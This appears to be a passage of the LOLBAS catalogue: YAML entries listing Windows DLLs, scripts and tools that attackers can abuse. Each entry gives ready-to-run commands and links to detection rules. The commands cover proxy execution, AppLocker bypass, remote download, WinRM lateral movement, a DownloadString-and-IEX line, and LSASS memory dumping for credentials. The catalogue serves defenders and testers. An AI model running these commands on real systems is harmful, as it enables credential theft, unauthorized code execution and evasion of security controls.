Author: LOLBAS Team Created: 2018-05-25 Commands: - Command: rundll32.exe shdocvw.dll,OpenURL {PATH_ABSOLUTE:.url} Description: Launch an executable payload via proxy through a URL (information) file by calling OpenURL. Usecase: Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed. Category: Execute Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: URL Full_Path: - Path: c:\windows\system32\shdocvw.dll - Path: c:\windows\syswow64\shdocvw.dll Code_Sample: - Code: https://gist.githubusercontent.com/bohops/89d7b11fa32062cfe31be9fdb18f050e/raw/1206a613a6621da21e7fd164b80a7ff01c5b64ab/calc.url Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml Resources: - Link: http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/ - Link: https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/ - Link: https://twitter.com/bohops/status/997690405092290561 - Link: https://windows10dll.nirsoft.net/shdocvw_dll.html Acknowledgement: - Person: Adam Handle: '@hexacorn' - Person: Jimmy Handle: '@bohops' ================================================ FILE: yml/OSLibraries/Shell32.yml ================================================ --- Name: Shell32.dll Description: Windows Shell Common Dll Author: LOLBAS Team Created: 2018-05-25 Commands: - Command: rundll32.exe shell32.dll,Control_RunDLL {PATH_ABSOLUTE:.dll} Description: Launch a DLL payload by calling the Control_RunDLL function. Usecase: Load a DLL payload. 
Category: Execute Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: DLL - Command: rundll32.exe shell32.dll,ShellExec_RunDLL {PATH:.exe} Description: Launch an executable by calling the ShellExec_RunDLL function. Usecase: Run an executable payload. Category: Execute Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE - Command: rundll32 SHELL32.DLL,ShellExec_RunDLL {PATH:.exe} {CMD:args} Description: Launch command line by calling the ShellExec_RunDLL function. Usecase: Run an executable payload. Category: Execute Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: CMD - Command: rundll32.exe shell32.dll,#44 {PATH:.dll} Description: Load a DLL/CPL by calling undocumented Control_RunDLLNoFallback function. Usecase: Load a DLL/CPL payload. Category: Execute Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: DLL Full_Path: - Path: c:\windows\system32\shell32.dll - Path: c:\windows\syswow64\shell32.dll Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml - Splunk: https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/rundll32_control_rundll_hunt.yml Resources: - Link: https://twitter.com/Hexacorn/status/885258886428725250 - Link: https://twitter.com/pabraeken/status/991768766898941953 - Link: https://twitter.com/mattifestation/status/776574940128485376 - Link: https://twitter.com/KyleHanslovan/status/905189665120149506 - Link: https://windows10dll.nirsoft.net/shell32_dll.html - Link: https://www.hexacorn.com/blog/2025/05/18/shell32-dll-44-lolbin/ Acknowledgement: - Person: Adam (Control_RunDLL, Control_RunDLLNoFallback) Handle: '@hexacorn' - Person: Pierre-Alexandre Braeken (ShellExec_RunDLL) Handle: '@pabraeken' - Person: Matt 
Graeber (ShellExec_RunDLL) Handle: '@mattifestation' - Person: Kyle Hanslovan (ShellExec_RunDLL) Handle: '@KyleHanslovan' ================================================ FILE: yml/OSLibraries/Shimgvw.yml ================================================ --- Name: Shimgvw.dll Description: Photo Gallery Viewer Author: Eral4m Created: 2021-01-06 Commands: - Command: rundll32.exe c:\Windows\System32\shimgvw.dll,ImageView_Fullscreen {REMOTEURL:.exe} Description: Once executed, rundll32.exe will download the file at the URL in the command to INetCache. Can also be used with entrypoint 'ImageView_FullscreenA'. Usecase: Download file from remote location. Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 Tags: - Download: INetCache Full_Path: - Path: c:\windows\system32\shimgvw.dll - Path: c:\windows\syswow64\shimgvw.dll Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml - IOC: Execution of rundll32.exe with 'ImageView_Fullscreen' and a protocol handler ('://') on the command line Resources: - Link: https://twitter.com/eral4m/status/1479080793003671557 Acknowledgement: - Person: Eral4m Handle: '@eral4m' ================================================ FILE: yml/OSLibraries/Syssetup.yml ================================================ --- Name: Syssetup.dll Description: Windows NT System Setup Author: LOLBAS Team Created: 2018-05-25 Commands: - Command: rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 {PATH_ABSOLUTE:.inf} Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). Usecase: Run local or remote script(let) code through INF file specification (Note May pop an error window). 
Category: AWL Bypass Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: INF - Command: rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 {PATH_ABSOLUTE:.inf} Description: Launch an executable file via the SetupInfObjectInstallAction function and .inf file section directive. Usecase: Load an executable payload. Category: Execute Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: INF Full_Path: - Path: c:\windows\system32\syssetup.dll - Path: c:\windows\syswow64\syssetup.dll Code_Sample: - Code: https://raw.githubusercontent.com/huntresslabs/evading-autoruns/master/shady.inf - Code: https://gist.github.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba#file-backdoor-minimalist-sct - Code: https://gist.github.com/homjxi0e/87b29da0d4f504cb675bb1140a931415 Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml - Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___syssetup.yml Resources: - Link: https://twitter.com/pabraeken/status/994392481927258113 - Link: https://twitter.com/harr0ey/status/975350238184697857 - Link: https://twitter.com/bohops/status/975549525938135040 - Link: https://windows10dll.nirsoft.net/syssetup_dll.html Acknowledgement: - Person: Pierre-Alexandre Braeken (Execute) Handle: '@pabraeken' - Person: Matt harr0ey (Execute) Handle: '@harr0ey' - Person: Jimmy (Scriptlet) Handle: '@bohops' ================================================ FILE: yml/OSLibraries/Url.yml ================================================ --- Name: Url.dll Description: Internet Shortcut Shell Extension DLL. 
Author: LOLBAS Team Created: 2018-05-25 Commands: - Command: rundll32.exe url.dll,OpenURL {PATH_ABSOLUTE:.hta} Description: Launch a HTML application payload by calling OpenURL. Usecase: Invoke an HTML Application via mshta.exe (Default Handler). Category: Execute Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: HTA - Command: rundll32.exe url.dll,OpenURL {PATH_ABSOLUTE:.url} Description: Launch an executable payload via proxy through a .url (information) file by calling OpenURL. Usecase: Load an executable payload by calling a .url file. Category: Execute Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: URL - Command: rundll32.exe url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e Description: Launch an executable by calling OpenURL. Usecase: Load an executable payload by specifying the file protocol handler (obfuscated). Category: Execute Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE - Command: rundll32.exe url.dll,FileProtocolHandler {PATH_ABSOLUTE:.exe} Description: Launch an executable by calling FileProtocolHandler. Usecase: Launch an executable. Category: Execute Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE - Command: rundll32.exe url.dll,FileProtocolHandler file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e Description: Launch an executable by calling FileProtocolHandler. Usecase: Load an executable payload by specifying the file protocol handler (obfuscated). Category: Execute Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE - Command: rundll32.exe url.dll,FileProtocolHandler file:///C:/test/test.hta Description: Launch a HTML application payload by calling FileProtocolHandler. Usecase: Invoke an HTML Application via mshta.exe (Default Handler). 
Category: Execute Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: HTA Full_Path: - Path: c:\windows\system32\url.dll - Path: c:\windows\syswow64\url.dll Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml Resources: - Link: https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/ - Link: https://twitter.com/DissectMalware/status/995348436353470465 - Link: https://twitter.com/bohops/status/974043815655956481 - Link: https://twitter.com/yeyint_mth/status/997355558070927360 - Link: https://twitter.com/Hexacorn/status/974063407321223168 - Link: https://windows10dll.nirsoft.net/url_dll.html Acknowledgement: - Person: Adam (OpenURL) Handle: '@hexacorn' - Person: Jimmy (OpenURL) Handle: '@bohops' - Person: Malwrologist (FileProtocolHandler - HTA) Handle: '@DissectMalware' - Person: r0lan (Obfuscation) Handle: '@r0lan' ================================================ FILE: yml/OSLibraries/Zipfldr.yml ================================================ --- Name: Zipfldr.dll Description: Compressed Folder library Author: LOLBAS Team Created: 2018-05-25 Commands: - Command: rundll32.exe zipfldr.dll,RouteTheCall {PATH:.exe} Description: Launch an executable payload by calling RouteTheCall. Usecase: Launch an executable. Category: Execute Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE - Command: rundll32.exe zipfldr.dll,RouteTheCall file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e Description: Launch an executable payload by calling RouteTheCall (obfuscated). Usecase: Launch an executable. 
Category: Execute Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE Full_Path: - Path: c:\windows\system32\zipfldr.dll - Path: c:\windows\syswow64\zipfldr.dll Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml Resources: - Link: https://twitter.com/moriarty_meng/status/977848311603380224 - Link: https://twitter.com/bohops/status/997896811904929792 - Link: https://windows10dll.nirsoft.net/zipfldr_dll.html Acknowledgement: - Person: Moriarty (Execution) Handle: '@moriarty_meng' - Person: r0lan (Obfuscation) Handle: '@r0lan' ================================================ FILE: yml/OSLibraries/comsvcs.yml ================================================ --- Name: Comsvcs.dll Description: COM+ Services Author: LOLBAS Team Created: 2019-08-30 Commands: - Command: rundll32 C:\windows\system32\comsvcs.dll MiniDump {LSASS_PID} dump.bin full Description: Calls the MiniDump exported function of comsvcs.dll, which in turns calls MiniDumpWriteDump. Usecase: Dump Lsass.exe process memory to retrieve credentials. 
Category: Dump Privileges: SYSTEM MitreID: T1003.001 OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: c:\windows\system32\comsvcs.dll Code_Sample: - Code: https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/ Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_rundll32_process_dump_via_comsvcs.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_access/proc_access_win_lsass_dump_comsvcs_dll.yml - Elastic: https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml - Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/dump_lsass_via_comsvcs_dll.yml Resources: - Link: https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/ Acknowledgement: - Person: modexp ================================================ FILE: yml/OSScripts/CL_LoadAssembly.yml ================================================ --- Name: CL_LoadAssembly.ps1 Description: PowerShell Diagnostic Script Author: Jimmy (@bohops) Created: 2021-09-26 Commands: - Command: 'powershell.exe -ep bypass -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\..\..\..\testing\fun.dll;[Program]::Fun()"' Description: Proxy execute Managed DLL with PowerShell Usecase: Execute proxied payload with Microsoft signed binary Category: Execute Privileges: User MitreID: T1216 OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11 Tags: - Execute: DLL (.NET) Full_Path: - Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1 Detection: - Sigma: 
https://github.com/SigmaHQ/sigma/blob/ff6c54ded6b52f379cec11fe17c1ccb956faa660/rules/windows/process_creation/proc_creation_win_lolbas_cl_loadassembly.yml Resources: - Link: https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/ Acknowledgement: - Person: Jimmy Handle: '@bohops' ================================================ FILE: yml/OSScripts/CL_mutexverifiers.yml ================================================ --- Name: CL_Mutexverifiers.ps1 Description: Proxy execution with CL_Mutexverifiers.ps1 Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: . C:\Windows\diagnostics\system\AERO\CL_Mutexverifiers.ps1 \nrunAfterCancelProcess {PATH:.ps1} Description: Import the PowerShell Diagnostic CL_Mutexverifiers script and call runAfterCancelProcess to launch an executable. Usecase: Proxy execution Category: Execute Privileges: User MitreID: T1216 OperatingSystem: Windows 10 Tags: - Execute: PowerShell Full_Path: - Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1 - Path: C:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1 - Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1 - Path: C:\Windows\diagnostics\system\Video\CL_Mutexverifiers.ps1 - Path: C:\Windows\diagnostics\system\Speech\CL_Mutexverifiers.ps1 Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_cl_mutexverifiers.yml Resources: - Link: https://twitter.com/pabraeken/status/995111125447577600 Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' ================================================ FILE: yml/OSScripts/Cl_invocation.yml ================================================ --- Name: CL_Invocation.ps1 Description: Aero diagnostics script Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: . 
C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1 \nSyncInvoke {CMD} Description: Import the PowerShell Diagnostic CL_Invocation script and call SyncInvoke to launch an executable. Usecase: Proxy execution Category: Execute Privileges: User MitreID: T1216 OperatingSystem: Windows 10 Tags: - Execute: CMD Full_Path: - Path: C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1 - Path: C:\Windows\diagnostics\system\Audio\CL_Invocation.ps1 - Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Invocation.ps1 Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_cl_invocation.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/powershell/powershell_script/posh_ps_cl_invocation_lolscript.yml Acknowledgement: - Person: Jimmy Handle: '@bohops' - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' ================================================ FILE: yml/OSScripts/Launch-VsDevShell.yml ================================================ --- Name: Launch-VsDevShell.ps1 Description: Locates and imports a Developer PowerShell module and calls the Enter-VsDevShell cmdlet Author: 'Nasreddine Bencherchali' Created: 2022-06-13 Commands: - Command: 'powershell -ep RemoteSigned -f .\Launch-VsDevShell.ps1 -VsWherePath {PATH_ABSOLUTE:.exe}' Description: Execute binaries from the context of the signed script using the "VsWherePath" flag. Usecase: Proxy execution Category: Execute Privileges: User MitreID: T1216 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE - Command: 'powershell -ep RemoteSigned -f .\Launch-VsDevShell.ps1 -VsInstallationPath "/../../../../../; {PATH:.exe} ;"' Description: Execute binaries and commands from the context of the signed script using the "VsInstallationPath" flag. 
Usecase: Proxy execution Category: Execute Privileges: User MitreID: T1216 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE Full_Path: - Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\Tools\Launch-VsDevShell.ps1 - Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\Tools\Launch-VsDevShell.ps1 Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_launch_vsdevshell.yml Resources: - Link: https://twitter.com/nas_bench/status/1535981653239255040 Acknowledgement: - Person: Nasreddine Bencherchali Handle: '@nas_bench' ================================================ FILE: yml/OSScripts/Manage-bde.yml ================================================ --- Name: Manage-bde.wsf Description: Script for managing BitLocker Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: set comspec={PATH_ABSOLUTE:.exe} & cscript c:\windows\system32\manage-bde.wsf Description: Set the comspec variable to another executable prior to calling manage-bde.wsf for execution. Usecase: Proxy execution from script Category: Execute Privileges: User MitreID: T1216 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: EXE - Command: copy c:\users\person\evil.exe c:\users\public\manage-bde.exe & cd c:\users\public\ & cscript.exe c:\windows\system32\manage-bde.wsf Description: Run the manage-bde.wsf script with a payload named manage-bde.exe in the same directory to run the payload file. 
Usecase: Proxy execution from script Category: Execute Privileges: User MitreID: T1216 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: EXE Full_Path: - Path: C:\Windows\System32\manage-bde.wsf Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_manage_bde.yml - IOC: Manage-bde.wsf should not be invoked by a standard user under normal situations Resources: - Link: https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712 - Link: https://twitter.com/bohops/status/980659399495741441 - Link: https://twitter.com/JohnLaTwC/status/1223292479270600706 Acknowledgement: - Person: Jimmy Handle: '@bohops' - Person: Daniel Bohannon Handle: '@danielbohannon' - Person: John Lambert Handle: '@JohnLaTwC' ================================================ FILE: yml/OSScripts/Pubprn.yml ================================================ --- Name: Pubprn.vbs Description: Proxy execution with Pubprn.vbs Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: pubprn.vbs 127.0.0.1 script:{REMOTEURL:.sct} Description: Set the 2nd variable with a Script COM moniker to perform Windows Script Host (WSH) Injection Usecase: Proxy execution Category: Execute Privileges: User MitreID: T1216.001 OperatingSystem: Windows 10 Tags: - Execute: SCT Full_Path: - Path: C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs - Path: C:\Windows\SysWOW64\Printing_Admin_Scripts\en-US\pubprn.vbs Code_Sample: - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Pubprn_calc.sct Detection: - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - Sigma: https://github.com/SigmaHQ/sigma/blob/ff5102832031425f6eed011dd3a2e62653008c94/rules/windows/process_creation/proc_creation_win_lolbin_pubprn.yml Resources: - 
Link: https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/ - Link: https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology - Link: https://github.com/enigma0x3/windows-operating-system-archaeology Acknowledgement: - Person: Matt Nelson Handle: '@enigma0x3' ================================================ FILE: yml/OSScripts/Syncappvpublishingserver.yml ================================================ --- Name: Syncappvpublishingserver.vbs Description: Script used related to app-v and publishing server Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: SyncAppvPublishingServer.vbs "n;((New-Object Net.WebClient).DownloadString('{REMOTEURL:.ps1}') | IEX" Description: Inject PowerShell script code with the provided arguments Usecase: Use Powershell host invoked from vbs script Category: Execute Privileges: User MitreID: T1216.002 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: PowerShell Full_Path: - Path: C:\Windows\System32\SyncAppvPublishingServer.vbs Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml Resources: - Link: https://twitter.com/monoxgas/status/895045566090010624 - Link: https://twitter.com/subTee/status/855738126882316288 Acknowledgement: - Person: Nick Landers Handle: '@monoxgas' - Person: Casey Smith Handle: '@subtee' ================================================ FILE: yml/OSScripts/UtilityFunctions.yml ================================================ --- Name: UtilityFunctions.ps1 Description: PowerShell Diagnostic Script Author: Jimmy (@bohops) Created: 2021-09-26 Commands: - Command: 'powershell.exe -ep bypass -command "set-location -path c:\windows\diagnostics\system\networking; import-module .\UtilityFunctions.ps1; RegSnapin ..\..\..\..\temp\unsigned.dll;[Program.Class]::Main()"' Description: Proxy execute Managed DLL with PowerShell Usecase: Execute 
proxied payload with Microsoft signed binary Category: Execute Privileges: User MitreID: T1216 OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11 Tags: - Execute: DLL (.NET) Full_Path: - Path: C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1 Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/0.21-688-gd172b136b/rules/windows/process_creation/proc_creation_win_lolbas_utilityfunctions.yml Resources: - Link: https://twitter.com/nickvangilder/status/1441003666274668546 Acknowledgement: - Person: Nick VanGilder Handle: '@nickvangilder' ================================================ FILE: yml/OSScripts/Winrm.yml ================================================ --- Name: winrm.vbs Description: Script used for manage Windows RM settings Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: 'winrm invoke Create wmicimv2/Win32_Process @{CommandLine="{CMD}"} -r:http://target:5985' Description: Lateral movement/Remote Command Execution via WMI Win32_Process class over the WinRM protocol Usecase: Proxy execution Category: Execute Privileges: User MitreID: T1216 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: CMD - Execute: Remote - Command: 'winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="{CMD}"} -r:http://acmedc:5985 && winrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985' Description: Lateral movement/Remote Command Execution via WMI Win32_Service class over the WinRM protocol Usecase: Proxy execution Category: Execute Privileges: Admin MitreID: T1216 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: CMD - Execute: Remote - Command: '%SystemDrive%\BypassDir\cscript //nologo %windir%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty' Description: Bypass AWL solutions by copying cscript.exe to an attacker-controlled location; creating a malicious WsmPty.xsl in the same location, and executing winrm.vbs via the relocated 
cscript.exe. Usecase: Execute arbitrary, unsigned code via XSL script Category: AWL Bypass Privileges: User MitreID: T1220 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: XSL Full_Path: - Path: C:\Windows\System32\winrm.vbs - Path: C:\Windows\SysWOW64\winrm.vbs Code_Sample: - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Slmgr.reg - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Slmgr_calc.sct Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_winrm_awl_bypass.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/file/file_event/file_event_win_winrm_awl_bypass.yml - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules Resources: - Link: https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology - Link: https://www.youtube.com/watch?v=3gz1QmiMhss - Link: https://github.com/enigma0x3/windows-operating-system-archaeology - Link: https://redcanary.com/blog/lateral-movement-winrm-wmi/ - Link: https://twitter.com/bohops/status/994405551751815170 - Link: https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404 - Link: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf Acknowledgement: - Person: Matt Graeber Handle: '@mattifestation' - Person: Matt Nelson Handle: '@enigma0x3' - Person: Casey Smith Handle: '@subtee' - Person: Jimmy Handle: '@bohops' - Person: Red Canary Company cc Tony Lambert Handle: 
'@redcanaryco' ================================================ FILE: yml/OSScripts/pester.yml ================================================ --- Name: Pester.bat Description: Used as part of the Powershell pester Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: Pester.bat [/help|?|-?|/?] "$null; {CMD}" Description: Execute code using Pester. The third parameter can be anything. The fourth is the payload. Usecase: Proxy execution Category: Execute Privileges: User MitreID: T1216 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE - Command: Pester.bat ;{PATH:.exe} Description: Execute code using Pester. Example here executes specified executable. Usecase: Proxy execution Category: Execute Privileges: User MitreID: T1216 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE Full_Path: - Path: c:\Program Files\WindowsPowerShell\Modules\Pester\\bin\Pester.bat Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_pester_1.yml Resources: - Link: https://twitter.com/Oddvarmoe/status/993383596244258816 - Link: https://twitter.com/_st0pp3r_/status/1560072680887525378 - Link: https://twitter.com/_st0pp3r_/status/1560072680887525378 Acknowledgement: - Person: Emin Atac Handle: '@p0w3rsh3ll' - Person: Stamatis Chatzimangou Handle: '@_st0pp3r_' ================================================ FILE: yml/OtherMSBinaries/AccCheckConsole.yml ================================================ --- Name: AccCheckConsole.exe Description: Verifies UI accessibility requirements Author: bohops Created: 2022-01-02 Commands: - Command: AccCheckConsole.exe -window "Untitled - Notepad" {PATH_ABSOLUTE:.dll} Description: Load a managed DLL in the context of AccCheckConsole.exe. The -window switch value can be set to an arbitrary active window name. Usecase: Local execution of managed code from assembly DLL. 
Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows Tags: - Execute: DLL (.NET) - Command: AccCheckConsole.exe -window "Untitled - Notepad" {PATH_ABSOLUTE:.dll} Description: Load a managed DLL in the context of AccCheckConsole.exe. The -window switch value can be set to an arbitrary active window name. Usecase: Local execution of managed code to bypass AppLocker. Category: AWL Bypass Privileges: User MitreID: T1218 OperatingSystem: Windows Tags: - Execute: DLL (.NET) Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x86\AccChecker\AccCheckConsole.exe - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x64\AccChecker\AccCheckConsole.exe - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\arm\AccChecker\AccCheckConsole.exe - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\arm64\AccChecker\AccCheckConsole.exe Code_Sample: - Code: https://docs.microsoft.com/en-us/windows/win32/winauto/custom-verification-routines Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_susp_acccheckconsole.yml - IOC: Sysmon Event ID 1 - Process Creation - Analysis: https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340 Resources: - Link: https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340 - Link: https://twitter.com/bohops/status/1477717351017680899 Acknowledgement: - Person: Jimmy Handle: '@bohops' ================================================ FILE: yml/OtherMSBinaries/Adplus.yml ================================================ --- Name: adplus.exe Description: Debugging tool included with Windows Debugging Tools Author: mr.d0x Created: 2021-09-01 Commands: - Command: adplus.exe -hang -pn lsass.exe -o {PATH_ABSOLUTE:folder} -quiet Description: Creates a memory dump of the lsass process Usecase: Create memory dump and parse it offline Category: Dump Privileges: SYSTEM MitreID: 
